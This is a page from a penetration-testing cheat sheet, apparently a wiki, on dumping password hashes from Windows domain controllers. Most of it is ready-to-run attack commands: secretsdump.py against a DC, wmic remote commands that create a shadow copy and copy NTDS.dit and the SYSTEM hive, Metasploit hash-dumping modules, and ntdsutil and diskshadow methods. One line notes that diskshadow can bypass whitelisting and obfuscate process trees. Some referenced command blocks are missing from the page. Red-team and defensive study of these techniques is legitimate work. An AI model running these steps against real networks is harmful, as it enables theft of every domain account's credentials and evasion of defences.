Dump the domain (Domain Controllers)

Remote Access

Secretsdump.py

secretsdump -just-dc-ntlm -user-status -o [out_file] [Domain]/[User]@[IP]

WMIC & NTDSutil

from: https://adsecurity.org/?p=2398

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

Metasploit

auxiliary/admin/smb/psexec_ntdsgrab
windows/gather/credentials/domain_hashdump

Local Access

NTDSutil

Windows binary allows for export of ntds.dit

This can then be extracted using secretsdump.py and registry hashes

Alternatively, additional information can be included such as if accounts are active:

Then the output can be filtered to remove both disabled and machine accounts:

Diskshadow

From Windows server 2008 and later, can use "diskshadow.exe" to copy NTDS.dit.

Create an instruction set for diskshadow.exe to create a new shadow disk copy of the disk C and expose it as drive M:\

Then run:

Side note: diskshadow can be utilised for whitelisting bypass and process tree obfuscation using the "exec" function.

Extracting from NTDS.dit

Secretsdump.py as described above, or any of the following tools

PreviousDumping registry hivesNextBrowser cookies & passwords

Last updated

Was this helpful?